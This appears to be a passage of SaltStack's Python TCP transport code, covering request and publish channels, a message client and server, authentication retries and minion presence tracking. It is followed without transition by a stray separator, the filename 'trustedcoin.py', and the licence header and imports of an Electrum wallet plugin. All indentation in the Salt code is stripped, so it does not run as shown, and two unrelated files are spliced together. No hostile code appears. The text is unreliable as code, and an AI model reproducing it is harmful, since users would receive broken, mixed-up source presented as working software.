def _crypted_transfer(self, load, tries=3, timeout=60):
'''
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
'''
@tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
try:
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError('Connection to master lost')
raise tornado.gen.Return(ret)
class AsyncTCPPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.event = salt.utils.event.get_event(
'minion',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
def __del__(self):
self.close()
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def send_id(self, tok, force_auth):
'''
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
'''
load = {'id': self.opts['id'], 'tok': tok}
@tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while count <= self.opts['tcp_authentication_retries'] or self.opts['tcp_authentication_retries'] < 0:
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event(
{'master': self.opts['master']},
'__master_connected'
)
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get('__role') == 'syndic':
data = 'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'syndic'
)
else:
data = 'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'minion'
)
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': None,
'tok': self.tok,
'data': data,
'tag': tag}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel, (self.opts,)
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event(
{'master': self.opts['master']},
'__master_disconnected'
)
@tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b'salt')
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts['master_ip'], int(self.auth.creds['publish_port']),),
kwargs={'io_loop': self.io_loop,
'connect_callback': self.connect_callback,
'disconnect_callback': self.disconnect_callback,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_publish_port')})
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt:
raise
except Exception as exc:
if '-|RETRY|-' not in six.text_type(exc):
raise SaltClientError('Unable to sign_in to master: {0}'.format(exc)) # TODO: better error message
def on_recv(self, callback):
'''
Register an on_recv callback
'''
if callback is None:
return self.message_client.on_recv(callback)
@tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = msgpack.loads(body)
if six.PY3:
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise exc
self._socket.close()
self._socket = None
if hasattr(self.req_server, 'stop'):
try:
self.req_server.stop()
except Exception as exc:
log.exception('TCPReqServerChannel close generated an exception: %s', str(exc))
def __del__(self):
self.close()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(self.socket_queue,
self.handle_message,
ssl_options=self.opts.get('ssl'))
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self.req_server = SaltMessageServer(self.handle_message,
ssl_options=self.opts.get('ssl'))
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
@tornado.gen.coroutine
def handle_message(self, stream, header, payload):
'''
Handle incoming messages from underylying tcp streams
'''
try:
try:
payload = self._decode_payload(payload)
except Exception:
stream.write(salt.transport.frame.frame_msg('bad load', header=header))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
yield stream.write(salt.transport.frame.frame_msg(
'payload and load must be a dict', header=header))
raise tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
yield stream.write(salt.transport.frame.frame_msg(
self._auth(payload['load']), header=header))
raise tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.write('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
stream.close()
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == 'send':
stream.write(salt.transport.frame.frame_msg(self.crypticle.dumps(ret), header=header))
elif req_fun == 'send_private':
stream.write(salt.transport.frame.frame_msg(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
), header=header))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.write('Server-side exception handling payload')
stream.close()
except tornado.gen.Return:
raise
except tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error('Connection was unexpectedly closed', exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error('Unexpected exception occurred: %s', exc, exc_info=True)
raise tornado.gen.Return()
class SaltMessageServer(tornado.tcpserver.TCPServer, object):
'''
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
'''
def __init__(self, message_handler, *args, **kwargs):
super(SaltMessageServer, self).__init__(*args, **kwargs)
self.io_loop = tornado.ioloop.IOLoop.current()
self.clients = []
self.message_handler = message_handler
@tornado.gen.coroutine
def handle_stream(self, stream, address):
'''
Handle incoming streams and add messages to the incoming queue
'''
log.trace('Req client %s connected', address)
self.clients.append((stream, address))
unpacker = msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
self.io_loop.spawn_callback(self.message_handler, stream, header, framed_msg['body'])
except tornado.iostream.StreamClosedError:
log.trace('req client disconnected %s', address)
self.clients.remove((stream, address))
except Exception as e:
log.trace('other master-side exception: %s', e)
self.clients.remove((stream, address))
stream.close()
def shutdown(self):
'''
Shutdown the whole server
'''
for item in self.clients:
client, address = item
client.close()
self.clients.remove(item)
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
'''
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
'''
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super(LoadBalancerWorker, self).__init__(
message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
self._stop.set()
self.thread.join()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(tornado.tcpclient.TCPClient):
'''
Override _create_stream() in TCPClient to enable keep alive support.
'''
def __init__(self, opts, resolver=None):
self.opts = opts
super(TCPClientKeepAlive, self).__init__(resolver=resolver)
def _create_stream(self, max_buffer_size, af, addr, **kwargs): # pylint: disable=unused-argument
'''
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
'''
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = tornado.iostream.IOStream(
sock,
max_buffer_size=max_buffer_size)
if tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(SaltMessageClientPool, self).__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
def __del__(self):
self.close()
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
for future in futures:
yield future
raise tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient(object):
'''
Low-level message sending client
'''
def __init__(self, opts, host, port, io_loop=None, resolver=None,
connect_callback=None, disconnect_callback=None,
source_ip=None, source_port=None):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, '_stream') and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
elif self.io_loop != tornado.ioloop.IOLoop.current(instance=False):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self.io_loop.stop()
)
self.io_loop.start()
finally:
orig_loop.make_current()
self._tcp_client.close()
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
def __del__(self):
self.close()
def connect(self):
'''
Ask for this client to reconnect to the origin
'''
if hasattr(self, '_connecting_future') and not self._connecting_future.done():
future = self._connecting_future
else:
future = tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@tornado.gen.coroutine
def _connect(self):
'''
Try to connect for the rest of time!
'''
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {'source_ip': self.source_ip,
'source_port': self.source_port}
else:
log.warning('If you need a certain source IP/port, consider upgrading Tornado >= 4.5')
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(self.host,
self.port,
ssl_options=self.opts.get('ssl'),
**kwargs)
self._connecting_future.set_result(True)
break
except Exception as e:
yield tornado.gen.sleep(1) # TODO: backoff
#self._connecting_future.set_exception(e)
@tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done() or
self._connecting_future.result() is not True):
yield self._connecting_future
unpacker = msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(4096, partial=True)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
body = framed_msg['body']
message_id = header.get('mid')
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error('Got response for message_id %s that we are not tracking', message_id)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s:%s closed, unable to recv', self.host, self.port)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if 'detect_mode' in self.opts:
log.info('There was an error trying to use TCP transport; '
'attempting to fallback to another transport')
else:
raise SaltClientError
except Exception as e:
log.error('Exception parsing response', exc_info=True)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@tornado.gen.coroutine
def _stream_send(self):
while not self._connecting_future.done() or self._connecting_future.result() is not True:
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception('Unable to find available messageid')
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
'''
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(
SaltReqTimeoutError('Message timed out')
)
def send(self, msg, timeout=None, callback=None, raw=False):
'''
Send given message, and return a future
'''
message_id = self._message_id()
header = {'mid': message_id}
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message_id)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append((message_id, salt.transport.frame.frame_msg(msg, header=header)))
return future
class Subscriber(object):
'''
Client object for use with the TCP publisher server
'''
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
def __del__(self):
self.close()
class PubServer(tornado.tcpserver.TCPServer, object):
'''
TCP publisher
'''
def __init__(self, opts, io_loop=None):
super(PubServer, self).__init__(ssl_options=opts.get('ssl'))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
'master',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
def __del__(self):
self.close()
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {'new': [id_],
'lost': []}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {'new': [],
'lost': [id_]}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
@tornado.gen.coroutine
def _stream_read(self, client):
unpacker = msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
body = framed_msg['body']
if body['enc'] != 'aes':
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
load = crypticle.loads(body['load'])
if six.PY3:
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load['id'], load['tok']):
continue
client.id_ = load['id']
self._add_client_present(client)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s closed, unable to recv', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e:
log.error('Exception parsing response', exc_info=True)
continue
def handle_stream(self, stream, address):
log.trace('Subscriber at %s connected', address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug('TCP PubServer sending payload: %s', package)
payload = salt.transport.frame.frame_msg(package['payload'])
to_remove = []
if 'topic_lst' in package:
topic_lst = package['topic_lst']
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug('Publish target %s not connected', topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug('Subscriber at %s has disconnected from publisher', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace('TCP PubServer finished publishing payload')
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state['secrets']
self.__init__(state['opts'])
def __getstate__(self):
return {'opts': self.opts,
'secrets': salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get('log_queue')
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get('log_queue_level')
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts['interface'], int(self.opts['publish_port'])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=self.io_loop,
payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
'''
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue()
)
kwargs['log_queue_level'] = (
salt.log.setup.get_multiprocessing_logging_level()
)
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
'''
Publish "load" to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Use the Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
# TODO: switch to the actual asynchronous interface
#pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,)
)
pub_sock.connect()
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
if isinstance(load['tgt'], six.string_types):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload['topic_lst'] = match_ids
else:
int_payload['topic_lst'] = load['tgt']
# Send it over IPC!
pub_sock.send(int_payload)
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import os
import requests
import json
from urllib.parse import urljoin
from urllib.parse import quote
import electrum
